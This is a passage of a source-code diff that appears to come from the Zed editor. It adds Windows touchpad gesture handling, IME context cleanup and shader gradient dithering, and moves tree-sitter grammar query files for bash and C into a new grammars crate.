DIRECTMANIPULATION_VIEWPORT_OPTIONS_MANUALUPDATE + | DIRECTMANIPULATION_VIEWPORT_OPTIONS_DISABLEPIXELSNAPPING, + )?; + + let mut rect = RECT { + left: 0, + top: 0, + right: DEFAULT_VIEWPORT_SIZE, + bottom: DEFAULT_VIEWPORT_SIZE, + }; + viewport.SetViewportRect(&mut rect)?; + + manager.Activate(window)?; + viewport.Enable()?; + + let scale_factor = Rc::new(Cell::new(scale_factor)); + let pending_events = Rc::new(RefCell::new(Vec::new())); + + let event_handler: IDirectManipulationViewportEventHandler = + DirectManipulationEventHandler::new( + window, + Rc::clone(&scale_factor), + Rc::clone(&pending_events), + ) + .into(); + + let handler_cookie = viewport.AddEventHandler(Some(window), &event_handler)?; + + update_manager.Update(None)?; + + Ok(Self { + manager, + update_manager, + viewport, + _handler_cookie: handler_cookie, + window, + scale_factor, + pending_events, + }) + } + } + + pub fn set_scale_factor(&self, scale_factor: f32) { + self.scale_factor.set(scale_factor); + } + + pub fn on_pointer_hit_test(&self, wparam: WPARAM) { + unsafe { + let pointer_id = wparam.loword() as u32; + let mut pointer_type = POINTER_INPUT_TYPE::default(); + if GetPointerType(pointer_id, &mut pointer_type).is_ok() && pointer_type == PT_TOUCHPAD + { + self.viewport.SetContact(pointer_id).log_err(); + } + } + } + + pub fn update(&self) { + unsafe { + self.update_manager.Update(None).log_err(); + } + } + + pub fn drain_events(&self) -> Vec { + std::mem::take(&mut *self.pending_events.borrow_mut()) + } +} + +impl Drop for DirectManipulationHandler { + fn drop(&mut self) { + unsafe { + self.viewport.Stop().log_err(); + self.viewport.Abandon().log_err(); + self.manager.Deactivate(self.window).log_err(); + } + } +} + +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +enum GestureKind { + None, + Scroll, + Pinch, +} + +#[windows_core::implement(IDirectManipulationViewportEventHandler)] +struct DirectManipulationEventHandler { + window: HWND, + scale_factor: Rc>, + gesture_kind: Cell, + last_scale: Cell, + last_x_offset: Cell, + last_y_offset: Cell, + scroll_phase: Cell, + pending_events: Rc>>, +} + +impl DirectManipulationEventHandler { + fn new( + window: HWND, + scale_factor: Rc>, + pending_events: Rc>>, + ) -> Self { + Self { + window, + scale_factor, + gesture_kind: Cell::new(GestureKind::None), + last_scale: Cell::new(1.0), + last_x_offset: Cell::new(0.0), + last_y_offset: Cell::new(0.0), + scroll_phase: Cell::new(TouchPhase::Started), + pending_events, + } + } + + fn end_gesture(&self) { + let position = self.mouse_position(); + let modifiers = current_modifiers(); + match self.gesture_kind.get() { + GestureKind::Scroll => { + self.pending_events + .borrow_mut() + .push(PlatformInput::ScrollWheel(ScrollWheelEvent { + position, + delta: ScrollDelta::Pixels(point(px(0.0), px(0.0))), + modifiers, + touch_phase: TouchPhase::Ended, + })); + } + GestureKind::Pinch => { + self.pending_events + .borrow_mut() + .push(PlatformInput::Pinch(PinchEvent { + position, + delta: 0.0, + modifiers, + phase: TouchPhase::Ended, + })); + } + GestureKind::None => {} + } + self.gesture_kind.set(GestureKind::None); + } + + fn mouse_position(&self) -> Point { + let scale_factor = self.scale_factor.get(); + unsafe { + let mut point: POINT = std::mem::zeroed(); + let _ = GetCursorPos(&mut point); + let _ = ScreenToClient(self.window, &mut point); + logical_point(point.x as f32, point.y as f32, scale_factor) + } + } +} + +impl IDirectManipulationViewportEventHandler_Impl for DirectManipulationEventHandler_Impl { + fn OnViewportStatusChanged( + &self, + viewport: windows_core::Ref<'_, IDirectManipulationViewport>, + current: DIRECTMANIPULATION_STATUS, + previous: DIRECTMANIPULATION_STATUS, + ) -> windows_core::Result<()> { + if current == previous { + return Ok(()); + } + + // A new gesture interrupted inertia, so end the old sequence. + if current == DIRECTMANIPULATION_RUNNING && previous == DIRECTMANIPULATION_INERTIA { + self.end_gesture(); + } + + if current == DIRECTMANIPULATION_READY { + self.end_gesture(); + + // Reset the content transform so the viewport is ready for the next gesture. + // ZoomToRect triggers a second RUNNING -> READY cycle, so prevent an infinite loop here. + if self.last_scale.get() != 1.0 + || self.last_x_offset.get() != 0.0 + || self.last_y_offset.get() != 0.0 + { + if let Some(viewport) = viewport.as_ref() { + unsafe { + viewport + .ZoomToRect( + 0.0, + 0.0, + DEFAULT_VIEWPORT_SIZE as f32, + DEFAULT_VIEWPORT_SIZE as f32, + false, + ) + .log_err(); + } + } + } + + self.last_scale.set(1.0); + self.last_x_offset.set(0.0); + self.last_y_offset.set(0.0); + } + + Ok(()) + } + + fn OnViewportUpdated( + &self, + _viewport: windows_core::Ref<'_, IDirectManipulationViewport>, + ) -> windows_core::Result<()> { + Ok(()) + } + + fn OnContentUpdated( + &self, + _viewport: windows_core::Ref<'_, IDirectManipulationViewport>, + content: windows_core::Ref<'_, IDirectManipulationContent>, + ) -> windows_core::Result<()> { + let content = content.as_ref().ok_or(E_POINTER)?; + + // Get the 6-element content transform: [scale, 0, 0, scale, tx, ty] + let mut xform = [0.0f32; 6]; + unsafe { + content.GetContentTransform(&mut xform)?; + } + + let scale = xform[0]; + let scale_factor = self.scale_factor.get(); + let x_offset = xform[4] / scale_factor; + let y_offset = xform[5] / scale_factor; + + if scale == 0.0 { + return Ok(()); + } + + let last_scale = self.last_scale.get(); + let last_x = self.last_x_offset.get(); + let last_y = self.last_y_offset.get(); + + if float_equals(scale, last_scale) + && float_equals(x_offset, last_x) + && float_equals(y_offset, last_y) + { + return Ok(()); + } + + let position = self.mouse_position(); + let modifiers = current_modifiers(); + + // Direct Manipulation reports both translation and scale in every content update. + // Translation values can shift during a pinch due to the zoom center shifting. + // We classify each gesture as either scroll or pinch and only emit one type of event. + // We allow Scroll -> Pinch (a pinch can start with a small pan) but not the reverse. + if !float_equals(scale, 1.0) { + if self.gesture_kind.get() != GestureKind::Pinch { + self.end_gesture(); + self.gesture_kind.set(GestureKind::Pinch); + self.pending_events + .borrow_mut() + .push(PlatformInput::Pinch(PinchEvent { + position, + delta: 0.0, + modifiers, + phase: TouchPhase::Started, + })); + } + } else if self.gesture_kind.get() == GestureKind::None { + self.gesture_kind.set(GestureKind::Scroll); + self.scroll_phase.set(TouchPhase::Started); + } + + match self.gesture_kind.get() { + GestureKind::Scroll => { + let dx = x_offset - last_x; + let dy = y_offset - last_y; + let touch_phase = self.scroll_phase.get(); + self.scroll_phase.set(TouchPhase::Moved); + self.pending_events + .borrow_mut() + .push(PlatformInput::ScrollWheel(ScrollWheelEvent { + position, + delta: ScrollDelta::Pixels(point(px(dx), px(dy))), + modifiers, + touch_phase, + })); + } + GestureKind::Pinch => { + let scale_delta = scale / last_scale; + self.pending_events + .borrow_mut() + .push(PlatformInput::Pinch(PinchEvent { + position, + delta: scale_delta - 1.0, + modifiers, + phase: TouchPhase::Moved, + })); + } + GestureKind::None => {} + } + + self.last_scale.set(scale); + self.last_x_offset.set(x_offset); + self.last_y_offset.set(y_offset); + + Ok(()) + } +} + +fn float_equals(f1: f32, f2: f32) -> bool { + const EPSILON_SCALE: f32 = 0.00001; + (f1 - f2).abs() < EPSILON_SCALE * f1.abs().max(f2.abs()).max(EPSILON_SCALE) +} diff --git a/crates/gpui_windows/src/directx_atlas.rs b/crates/gpui_windows/src/directx_atlas.rs index a2ded660ca232a32b2a609c6185a95433c803d9c..03acadb8607ed3e7d957e7faa73960724fa09888 100644 --- a/crates/gpui_windows/src/directx_atlas.rs +++ b/crates/gpui_windows/src/directx_atlas.rs @@ -116,7 +116,6 @@ impl PlatformAtlas for DirectXAtlas { texture.decrement_ref_count(); if texture.is_unreferenced() { textures.free_list.push(texture.id.index as usize); - lock.tiles_by_key.remove(key); } else { *texture_slot = Some(texture); } diff --git a/crates/gpui_windows/src/dispatcher.rs b/crates/gpui_windows/src/dispatcher.rs index 060cdb7ba626133b9c201980e54bd0479694faa6..60b9898cef3076fa64898ebcb7223616150bf01b 100644 --- a/crates/gpui_windows/src/dispatcher.rs +++ b/crates/gpui_windows/src/dispatcher.rs @@ -24,7 +24,7 @@ use windows::{ use crate::{HWND, SafeHwnd, WM_GPUI_TASK_DISPATCHED_ON_MAIN_THREAD}; use gpui::{ GLOBAL_THREAD_TIMINGS, PlatformDispatcher, Priority, PriorityQueueSender, RunnableVariant, - THREAD_TIMINGS, TaskTiming, ThreadTaskTimings, TimerResolutionGuard, + TaskTiming, ThreadTaskTimings, TimerResolutionGuard, }; pub(crate) struct WindowsDispatcher { @@ -58,10 +58,6 @@ impl WindowsDispatcher { let mut task_wrapper = Some(runnable); WorkItemHandler::new(move |_| { let runnable = task_wrapper.take().unwrap(); - // Check if the executor that spawned this task was closed - if runnable.metadata().is_closed() { - return Ok(()); - } Self::execute_runnable(runnable); Ok(()) }) @@ -75,10 +71,6 @@ impl WindowsDispatcher { let mut task_wrapper = Some(runnable); TimerElapsedHandler::new(move |_| { let runnable = task_wrapper.take().unwrap(); - // Check if the executor that spawned this task was closed - if runnable.metadata().is_closed() { - return Ok(()); - } Self::execute_runnable(runnable); Ok(()) }) @@ -114,25 +106,7 @@ impl PlatformDispatcher for WindowsDispatcher { } fn get_current_thread_timings(&self) -> gpui::ThreadTaskTimings { - THREAD_TIMINGS.with(|timings| { - let timings = timings.lock(); - let thread_name = timings.thread_name.clone(); - let total_pushed = timings.total_pushed; - let timings = &timings.timings; - - let mut vec = Vec::with_capacity(timings.len()); - - let (s1, s2) = timings.as_slices(); - vec.extend_from_slice(s1); - vec.extend_from_slice(s2); - - gpui::ThreadTaskTimings { - thread_name, - thread_id: std::thread::current().id(), - timings: vec, - total_pushed, - } - }) + gpui::profiler::get_current_thread_task_timings() } fn is_main_thread(&self) -> bool { diff --git a/crates/gpui_windows/src/events.rs b/crates/gpui_windows/src/events.rs index 6bc7b73cc756b44b08ddf7abc5f668681c03dcb9..21eb6bed899687e1c639efdc40788c229fdc4728 100644 --- a/crates/gpui_windows/src/events.rs +++ b/crates/gpui_windows/src/events.rs @@ -111,6 +111,7 @@ impl WindowsWindowInner { WM_GPUI_CURSOR_STYLE_CHANGED => self.handle_cursor_changed(lparam), WM_GPUI_FORCE_UPDATE_WINDOW => self.draw_window(handle, true), WM_GPUI_GPU_DEVICE_LOST => self.handle_device_lost(lparam), + DM_POINTERHITTEST => self.handle_dm_pointer_hit_test(wparam), _ => None, }; if let Some(n) = handled { @@ -593,33 +594,63 @@ impl WindowsWindowInner { } pub(crate) fn update_ime_position(&self, handle: HWND, caret_position: POINT) { + let Some(ctx) = ImeContext::get(handle) else { + return; + }; unsafe { - let ctx = ImmGetContext(handle); - if ctx.is_invalid() { - return; - } + ImmSetCompositionWindow( + *ctx, + &COMPOSITIONFORM { + dwStyle: CFS_POINT, + ptCurrentPos: caret_position, + ..Default::default() + }, + ) + .ok() + .log_err(); - let config = COMPOSITIONFORM { - dwStyle: CFS_POINT, - ptCurrentPos: caret_position, - ..Default::default() - }; - ImmSetCompositionWindow(ctx, &config).ok().log_err(); - let config = CANDIDATEFORM { - dwStyle: CFS_CANDIDATEPOS, - ptCurrentPos: caret_position, - ..Default::default() - }; - ImmSetCandidateWindow(ctx, &config).ok().log_err(); - ImmReleaseContext(handle, ctx).ok().log_err(); + ImmSetCandidateWindow( + *ctx, + &CANDIDATEFORM { + dwStyle: CFS_CANDIDATEPOS, + ptCurrentPos: caret_position, + ..Default::default() + }, + ) + .ok() + .log_err(); + } + } + + fn update_ime_enabled(&self, handle: HWND) { + let ime_enabled = self + .with_input_handler(|input_handler| input_handler.query_accepts_text_input()) + .unwrap_or(false); + if ime_enabled == self.state.ime_enabled.get() { + return; + } + self.state.ime_enabled.set(ime_enabled); + unsafe { + if ime_enabled { + ImmAssociateContextEx(handle, HIMC::default(), IACE_DEFAULT) + .ok() + .log_err(); + } else { + if let Some(ctx) = ImeContext::get(handle) { + ImmNotifyIME(*ctx, NI_COMPOSITIONSTR, CPS_COMPLETE, 0) + .ok() + .log_err(); + } + ImmAssociateContextEx(handle, HIMC::default(), 0) + .ok() + .log_err(); + } } } fn handle_ime_composition(&self, handle: HWND, lparam: LPARAM) -> Option { - let ctx = unsafe { ImmGetContext(handle) }; - let result = self.handle_ime_composition_inner(ctx, lparam); - unsafe { ImmReleaseContext(handle, ctx).ok().log_err() }; - result + let ctx = ImeContext::get(handle)?; + self.handle_ime_composition_inner(*ctx, lparam) } fn handle_ime_composition_inner(&self, ctx: HIMC, lparam: LPARAM) -> Option { @@ -728,6 +759,10 @@ impl WindowsWindowInner { self.state.scale_factor.set(new_scale_factor); self.state.border_offset.update(handle).log_err(); + self.state + .direct_manipulation + .set_scale_factor(new_scale_factor); + if is_maximized { // Get the monitor and its work area at the new DPI let monitor = unsafe { MonitorFromWindow(handle, MONITOR_DEFAULTTONEAREST) }; @@ -1109,20 +1144,39 @@ impl WindowsWindowInner { Some(0) } + fn handle_dm_pointer_hit_test(&self, wparam: WPARAM) -> Option { + self.state.direct_manipulation.on_pointer_hit_test(wparam); + None + } + #[inline] fn draw_window(&self, handle: HWND, force_render: bool) -> Option { let mut request_frame = self.state.callbacks.request_frame.take()?; - // we are instructing gpui to force render a frame, this will - // re-populate all the gpu textures for us so we can resume drawing in - // case we disabled drawing earlier due to a device loss - self.state.renderer.borrow_mut().mark_drawable(); + self.state.direct_manipulation.update(); + + let events = self.state.direct_manipulation.drain_events(); + if !events.is_empty() { + if let Some(mut func) = self.state.callbacks.input.take() { + for event in events { + func(event); + } + self.state.callbacks.input.set(Some(func)); + } + } + + if force_render { + // Re-enable drawing after a device loss recovery. The forced render + // will rebuild the scene with fresh atlas textures. + self.state.renderer.borrow_mut().mark_drawable(); + } request_frame(RequestFrameOptions { require_presentation: false, force_render, }); self.state.callbacks.request_frame.set(Some(request_frame)); + self.update_ime_enabled(handle); unsafe { ValidateRect(Some(handle), None).ok().log_err() }; Some(0) @@ -1205,6 +1259,36 @@ impl WindowsWindowInner { } } +struct ImeContext { + hwnd: HWND, + himc: HIMC, +} + +impl ImeContext { + fn get(hwnd: HWND) -> Option { + let himc = unsafe { ImmGetContext(hwnd) }; + if himc.is_invalid() { + return None; + } + Some(Self { hwnd, himc }) + } +} + +impl std::ops::Deref for ImeContext { + type Target = HIMC; + fn deref(&self) -> &HIMC { + &self.himc + } +} + +impl Drop for ImeContext { + fn drop(&mut self) { + unsafe { + ImmReleaseContext(self.hwnd, self.himc).ok().log_err(); + } + } +} + fn handle_key_event( wparam: WPARAM, lparam: LPARAM, diff --git a/crates/gpui_windows/src/gpui_windows.rs b/crates/gpui_windows/src/gpui_windows.rs index af7408569ab1c88fc5f433795da99354942d89f2..0af5411d20e4fbb9d326e833641a2d4e5369dcb2 100644 --- a/crates/gpui_windows/src/gpui_windows.rs +++ b/crates/gpui_windows/src/gpui_windows.rs @@ -2,6 +2,7 @@ mod clipboard; mod destination_list; +mod direct_manipulation; mod direct_write; mod directx_atlas; mod directx_devices; diff --git a/crates/gpui_windows/src/platform.rs b/crates/gpui_windows/src/platform.rs index 182107138579be858272329a75a9daededd438e4..7e9f1e77487b4185fbad9e1dc66cfcb1c8191e61 100644 --- a/crates/gpui_windows/src/platform.rs +++ b/crates/gpui_windows/src/platform.rs @@ -1326,7 +1326,15 @@ unsafe extern "system" fn window_procedure( } let inner = unsafe { &*ptr }; let result = if let Some(inner) = inner.upgrade() { - inner.handle_msg(hwnd, msg, wparam, lparam) + if cfg!(debug_assertions) { + let inner = std::panic::AssertUnwindSafe(inner); + match std::panic::catch_unwind(|| { inner }.handle_msg(hwnd, msg, wparam, lparam)) { + Ok(result) => result, + Err(_) => std::process::abort(), + } + } else { + inner.handle_msg(hwnd, msg, wparam, lparam) + } } else { unsafe { DefWindowProcW(hwnd, msg, wparam, lparam) } }; diff --git a/crates/gpui_windows/src/shaders.hlsl b/crates/gpui_windows/src/shaders.hlsl index f508387daf9c98ffcce521209d2c981cf04db983..646cfd61cc37c31fade09d427c6d7c8f87519fa6 100644 --- a/crates/gpui_windows/src/shaders.hlsl +++ b/crates/gpui_windows/src/shaders.hlsl @@ -384,6 +384,20 @@ float4 gradient_color(Background background, break; } } + + // Dither to reduce banding in gradients (especially dark/alpha). + // Triangular-distributed noise breaks up 8-bit quantization steps. + // ±2/255 for RGB (enough for dark-on-dark compositing), + // ±3/255 for alpha (needs more because alpha × dark color = tiny steps). + { + float2 seed = position * 0.6180339887; // golden ratio spread + float r1 = frac(sin(dot(seed, float2(12.9898, 78.233))) * 43758.5453); + float r2 = frac(sin(dot(seed, float2(39.3460, 11.135))) * 24634.6345); + float tri = r1 + r2 - 1.0; // triangular PDF, range [-1, +1] + color.rgb += tri * 2.0 / 255.0; + color.a += tri * 3.0 / 255.0; + } + break; } case 2: { diff --git a/crates/gpui_windows/src/window.rs b/crates/gpui_windows/src/window.rs index 02653d7e53a4356979b81897b39ab0393bbf54a9..f655c1989e2c69743032703532f91b3b517084b6 100644 --- a/crates/gpui_windows/src/window.rs +++ b/crates/gpui_windows/src/window.rs @@ -20,12 +20,15 @@ use windows::{ Foundation::*, Graphics::Dwm::*, Graphics::Gdi::*, - System::{Com::*, LibraryLoader::*, Ole::*, SystemServices::*}, + System::{ + Com::*, Diagnostics::Debug::MessageBeep, LibraryLoader::*, Ole::*, SystemServices::*, + }, UI::{Controls::*, HiDpi::*, Input::KeyboardAndMouse::*, Shell::*, WindowsAndMessaging::*}, }, core::*, }; +use crate::direct_manipulation::DirectManipulationHandler; use crate::*; use gpui::*; @@ -52,10 +55,12 @@ pub struct WindowsWindowState { pub callbacks: Callbacks, pub input_handler: Cell>, + pub ime_enabled: Cell, pub pending_surrogate: Cell>, pub last_reported_modifiers: Cell>, pub last_reported_capslock: Cell>, pub hovered: Cell, + pub direct_manipulation: DirectManipulationHandler, pub renderer: RefCell, @@ -130,6 +135,9 @@ impl WindowsWindowState { let fullscreen = None; let initial_placement = None; + let direct_manipulation = DirectManipulationHandler::new(hwnd, scale_factor) + .context("initializing Direct Manipulation")?; + Ok(Self { origin: Cell::new(origin), logical_size: Cell::new(logical_size), @@ -142,6 +150,7 @@ impl WindowsWindowState { min_size, callbacks, input_handler: Cell::new(input_handler), + ime_enabled: Cell::new(true), pending_surrogate: Cell::new(pending_surrogate), last_reported_modifiers: Cell::new(last_reported_modifiers), last_reported_capslock: Cell::new(last_reported_capslock), @@ -155,6 +164,7 @@ impl WindowsWindowState { initial_placement: Cell::new(initial_placement), hwnd, invalidate_devices, + direct_manipulation, }) } @@ -530,10 +540,9 @@ impl rwh::HasWindowHandle for WindowsWindow { } } -// todo(windows) impl rwh::HasDisplayHandle for WindowsWindow { fn display_handle(&self) -> std::result::Result, rwh::HandleError> { - unimplemented!() + Ok(rwh::DisplayHandle::windows()) } } @@ -942,6 +951,11 @@ impl PlatformWindow for WindowsWindow { self.0.update_ime_position(self.0.hwnd, caret_position); } + + fn play_system_bell(&self) { + // MB_OK: The sound specified as the Windows Default Beep sound. + let _ = unsafe { MessageBeep(MB_OK) }; + } } #[implement(IDropTarget)] diff --git a/crates/grammars/Cargo.toml b/crates/grammars/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..13b3bf5c94bb459e49e5b1f337fe95b1b216829a --- /dev/null +++ b/crates/grammars/Cargo.toml @@ -0,0 +1,60 @@ +[package] +name = "grammars" +version = "0.1.0" +edition = "2024" +publish = false + +[lints] +workspace = true + +[lib] +path = "src/grammars.rs" + +[dependencies] +language_core.workspace = true +rust-embed.workspace = true +anyhow.workspace = true +toml.workspace = true +util.workspace = true + +tree-sitter = { workspace = true, optional = true } +tree-sitter-bash = { workspace = true, optional = true } +tree-sitter-c = { workspace = true, optional = true } +tree-sitter-cpp = { workspace = true, optional = true } +tree-sitter-css = { workspace = true, optional = true } +tree-sitter-diff = { workspace = true, optional = true } +tree-sitter-gitcommit = { workspace = true, optional = true } +tree-sitter-go = { workspace = true, optional = true } +tree-sitter-go-mod = { workspace = true, optional = true } +tree-sitter-gowork = { workspace = true, optional = true } +tree-sitter-jsdoc = { workspace = true, optional = true } +tree-sitter-json = { workspace = true, optional = true } +tree-sitter-md = { workspace = true, optional = true } +tree-sitter-python = { workspace = true, optional = true } +tree-sitter-regex = { workspace = true, optional = true } +tree-sitter-rust = { workspace = true, optional = true } +tree-sitter-typescript = { workspace = true, optional = true } +tree-sitter-yaml = { workspace = true, optional = true } + +[features] +load-grammars = [ + "tree-sitter", + "tree-sitter-bash", + "tree-sitter-c", + "tree-sitter-cpp", + "tree-sitter-css", + "tree-sitter-diff", + "tree-sitter-gitcommit", + "tree-sitter-go", + "tree-sitter-go-mod", + "tree-sitter-gowork", + "tree-sitter-jsdoc", + "tree-sitter-json", + "tree-sitter-md", + "tree-sitter-python", + "tree-sitter-regex", + "tree-sitter-rust", + "tree-sitter-typescript", + "tree-sitter-yaml", +] +test-support = ["load-grammars"] diff --git a/crates/eval/LICENSE-GPL b/crates/grammars/LICENSE-GPL similarity index 100% rename from crates/eval/LICENSE-GPL rename to crates/grammars/LICENSE-GPL diff --git a/crates/grammars/src/bash/brackets.scm b/crates/grammars/src/bash/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..aba1fa2b35735d4380761ea6e1360305556072b3 --- /dev/null +++ b/crates/grammars/src/bash/brackets.scm @@ -0,0 +1,62 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! rainbow.exclude)) + +(("do" @open + "done" @close) + (#set! newline.only) + (#set! rainbow.exclude)) + +((case_statement + ("in" @open + "esac" @close)) + (#set! newline.only) + (#set! rainbow.exclude)) + +((if_statement + (elif_clause + "then" @open) + (else_clause + "else" @close)) + (#set! newline.only) + (#set! rainbow.exclude)) + +((if_statement + (else_clause + "else" @open) + "fi" @close) + (#set! newline.only) + (#set! rainbow.exclude)) + +((if_statement + "then" @open + (elif_clause + "elif" @close)) + (#set! newline.only) + (#set! rainbow.exclude)) + +((if_statement + "then" @open + (else_clause + "else" @close)) + (#set! newline.only) + (#set! rainbow.exclude)) + +((if_statement + ("then" @open + "fi" @close)) + (#set! newline.only) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/bash/config.toml b/crates/grammars/src/bash/config.toml similarity index 97% rename from crates/languages/src/bash/config.toml rename to crates/grammars/src/bash/config.toml index 8ff4802aee5124201d013e0b2f0b01c7046e55a0..06574629f186800f4d95244d7c4129cbc6505d22 100644 --- a/crates/languages/src/bash/config.toml +++ b/crates/grammars/src/bash/config.toml @@ -2,6 +2,7 @@ name = "Shell Script" code_fence_block_name = "bash" grammar = "bash" path_suffixes = ["sh", "bash", "bashrc", "bash_profile", "bash_aliases", "bash_logout", "bats", "profile", "zsh", "zshrc", "zshenv", "zsh_profile", "zsh_aliases", "zsh_histfile", "zlogin", "zprofile", ".env", "PKGBUILD", "APKBUILD"] +modeline_aliases = ["sh", "shell", "zsh", "fish"] line_comments = ["# "] first_line_pattern = '^#!.*\b(?:ash|bash|bats|dash|sh|zsh)\b' autoclose_before = "}])" diff --git a/crates/languages/src/bash/highlights.scm b/crates/grammars/src/bash/highlights.scm similarity index 82% rename from crates/languages/src/bash/highlights.scm rename to crates/grammars/src/bash/highlights.scm index 4a8d7eaf345b147270302b5ba8f20c975494766e..bc1c3b7ec1159f6d19cdf20ab36e0a02db076c66 100644 --- a/crates/languages/src/bash/highlights.scm +++ b/crates/grammars/src/bash/highlights.scm @@ -43,13 +43,17 @@ (comment) @keyword.directive) (#match? @keyword.directive "^#![ \t]*/")) -(function_definition name: (word) @function) -(command_name (word) @function) +(function_definition + name: (word) @function) + +(command_name + (word) @function) (command argument: [ (word) @variable.parameter - (_ (word) @variable.parameter) + (_ + (word) @variable.parameter) ]) [ @@ -65,7 +69,6 @@ (expansion) ] @embedded - [ "$" "&&" @@ -89,9 +92,7 @@ (test_operator) @keyword.operator -[ - ";" -] @punctuation.delimiter +";" @punctuation.delimiter [ "(" @@ -104,6 +105,7 @@ (simple_expansion "$" @punctuation.special) + (expansion "${" @punctuation.special "}" @punctuation.special) @embedded @@ -112,10 +114,11 @@ "$(" @punctuation.special ")" @punctuation.special) -( - (command (_) @constant) - (#match? @constant "^-") -) +((command + (_) @constant) + (#match? @constant "^-")) + +(case_item + value: (_) @string.regex) -(case_item value: (_) @string.regex) (special_variable_name) @variable.special diff --git a/crates/languages/src/bash/indents.scm b/crates/grammars/src/bash/indents.scm similarity index 70% rename from crates/languages/src/bash/indents.scm rename to crates/grammars/src/bash/indents.scm index 468fc595e56e2616547dc3e752318cd89df4a363..25a0dc20fd7fff62cd355d20917260e8e781e90e 100644 --- a/crates/languages/src/bash/indents.scm +++ b/crates/grammars/src/bash/indents.scm @@ -1,12 +1,27 @@ -(_ "[" "]" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent +(_ + "[" + "]" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent (function_definition) @start.function + (if_statement) @start.if + (elif_clause) @start.elif + (else_clause) @start.else + (for_statement) @start.for + (while_statement) @start.while + (case_statement) @start.case + (case_item) @start.case_item diff --git a/crates/grammars/src/bash/injections.scm b/crates/grammars/src/bash/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/crates/grammars/src/bash/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/crates/languages/src/bash/overrides.scm b/crates/grammars/src/bash/overrides.scm similarity index 97% rename from crates/languages/src/bash/overrides.scm rename to crates/grammars/src/bash/overrides.scm index 81fec9a5f57b28fc67b4781ec37df43559e21dc9..544e9876f8ea8f1d676ee21731fdcb30fc7163ec 100644 --- a/crates/languages/src/bash/overrides.scm +++ b/crates/grammars/src/bash/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string) @string diff --git a/crates/grammars/src/bash/redactions.scm b/crates/grammars/src/bash/redactions.scm new file mode 100644 index 0000000000000000000000000000000000000000..5c2c83aa666e31ae23b7e54f966638f41f98244e --- /dev/null +++ b/crates/grammars/src/bash/redactions.scm @@ -0,0 +1,2 @@ +(variable_assignment + value: (_) @redact) diff --git a/crates/grammars/src/bash/runnables.scm b/crates/grammars/src/bash/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..3856495422dcd84b9c3619d34778e2183aae8498 --- /dev/null +++ b/crates/grammars/src/bash/runnables.scm @@ -0,0 +1,5 @@ +; Run bash scripts +((program + . + (_) @run) @_bash-script + (#set! tag bash-script)) diff --git a/crates/languages/src/bash/textobjects.scm b/crates/grammars/src/bash/textobjects.scm similarity index 76% rename from crates/languages/src/bash/textobjects.scm rename to crates/grammars/src/bash/textobjects.scm index cca2f7d9e9e4a876984a602ee308ad7270b684dc..9a5e4853ee711abbc7407185a6da19b0c9cc3fef 100644 --- a/crates/languages/src/bash/textobjects.scm +++ b/crates/grammars/src/bash/textobjects.scm @@ -2,6 +2,6 @@ body: (_ "{" (_)* @function.inside - "}" )) @function.around + "}")) @function.around (comment) @comment.around diff --git a/crates/grammars/src/c/brackets.scm b/crates/grammars/src/c/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..313d212a5eb28d006775781576d50e359be675a2 --- /dev/null +++ b/crates/grammars/src/c/brackets.scm @@ -0,0 +1,16 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/c/config.toml b/crates/grammars/src/c/config.toml similarity index 96% rename from crates/languages/src/c/config.toml rename to crates/grammars/src/c/config.toml index c490269b12309632d2fd8fb944ed48ee74c46075..a3b55f4f2d4fe3bfb19100e5877661c5841126a9 100644 --- a/crates/languages/src/c/config.toml +++ b/crates/grammars/src/c/config.toml @@ -17,4 +17,3 @@ brackets = [ ] debuggers = ["CodeLLDB", "GDB"] documentation_comment = { start = "/*", prefix = "* ", end = "*/", tab_size = 1 } -import_path_strip_regex = "^<|>$" diff --git a/crates/languages/src/c/highlights.scm b/crates/grammars/src/c/highlights.scm similarity index 95% rename from crates/languages/src/c/highlights.scm rename to crates/grammars/src/c/highlights.scm index e426bd4f9048a96c09aef297f95c420c9ec21458..b73c8e80b8acb61cc0cf47ed6585202eb73f4a7b 100644 --- a/crates/languages/src/c/highlights.scm +++ b/crates/grammars/src/c/highlights.scm @@ -38,7 +38,7 @@ "#ifndef" "#include" (preproc_directive) -] @preproc +] @keyword.preproc @preproc [ "=" @@ -116,19 +116,23 @@ (identifier) @variable ((identifier) @constant - (#match? @constant "^_*[A-Z][A-Z\\d_]*$")) + (#match? @constant "^_*[A-Z][A-Z\\d_]*$")) (call_expression function: (identifier) @function) + (call_expression function: (field_expression field: (field_identifier) @function)) + (function_declarator declarator: (identifier) @function) + (preproc_function_def name: (identifier) @function.special) (field_identifier) @property + (statement_identifier) @label [ @@ -139,6 +143,7 @@ ; GNU __attribute__ (attribute_specifier) @attribute + (attribute_specifier (argument_list (identifier) @attribute)) @@ -146,5 +151,6 @@ ; C23 [[attributes]] (attribute prefix: (identifier) @attribute) + (attribute name: (identifier) @attribute) diff --git a/crates/languages/src/c/indents.scm b/crates/grammars/src/c/indents.scm similarity index 79% rename from crates/languages/src/c/indents.scm rename to crates/grammars/src/c/indents.scm index b6d3c3c3bf7d1a05fd90667e42418bf9a389f8fb..0b55631e5ca6cdfca377f5bf4018d751cdf31bf4 100644 --- a/crates/languages/src/c/indents.scm +++ b/crates/grammars/src/c/indents.scm @@ -9,15 +9,25 @@ (else_clause) ] @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent ((comment) @indent - (#match? @indent 